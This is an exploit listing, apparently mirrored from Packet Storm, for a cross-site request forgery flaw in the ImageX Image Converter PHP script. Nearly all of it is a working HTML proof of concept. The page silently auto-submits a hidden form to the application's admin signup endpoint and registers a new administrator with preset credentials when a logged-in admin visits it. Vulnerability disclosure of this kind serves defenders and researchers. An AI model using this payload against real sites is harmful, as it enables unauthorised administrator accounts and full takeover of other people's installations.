Exploit for ImageX Image Converter Cross Site Request Forgery

## https://sploitus.com/exploit?id=PACKETSTORM:189625
Exploit Title: ImageX - Image Converter - Cross Site Request Forgery (CSRF) (Add Admin)
    Date: 05-03-2025
    Exploit Author: Buğra Enis Dönmez
    Vendor Homepage: https://www.codester.com/items/48649/imagex-image-converter-120-formats-php-script
    Version: latest
    Tested on: Arch Linux
    #####################################  CSRF PoC #####################################
    
    <!DOCTYPE html>
    <html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <h1>CSRF PoC</h1>
        <form id="csrfForm" action="https://localhost/mega-img-converter/actions/regadminsignupauth.php" method="POST" enctype="multipart/form-data">
            <input type="hidden" name="name" value="pwned@pwned.com" />
            <input type="hidden" name="lastname" value="neci" />
            <input type="hidden" name="email" value="enis@neci.com" />
            <input type="hidden" name="password" value="kenan5" />
            <input type="hidden" name="confirmpassword" value="kenan5" />
            <input type="hidden" name="isajax" value="someValue" />
        </form>
        <script>
            document.getElementById('csrfForm').submit();
        </script>
    </body>
    </html>
    
    #####################################  CSRF PoC Ended #####################################